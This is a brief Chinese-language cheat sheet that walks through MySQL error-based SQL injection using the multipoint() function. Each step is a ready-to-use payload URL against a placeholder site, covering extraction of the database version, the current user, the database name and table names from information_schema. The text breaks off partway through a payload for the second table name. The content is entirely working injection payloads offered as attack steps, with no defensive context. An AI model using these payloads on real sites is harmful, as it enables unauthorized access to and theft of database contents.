multipoint报错注入流程
获取数据库版本信息
- http://www.example.com/?id=1' and multipoint((select * from (select * from(select version())a)b)) --+
获取用户名相关信息
- http://www.example.com/?id=1' and multipoint((select * from (select * from(select user())a)b)) --+
获取数据库名的信息
- http://www.example.com/?id=1' and multipoint((select * from (select * from(select database())a)b)) --+
获取数据库的表信息
查询第一个表名信息:
- http://www.example.com/?id=1' and multipoint((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)) --+
查询第二个表名信息:
- http://www.example.com/?id&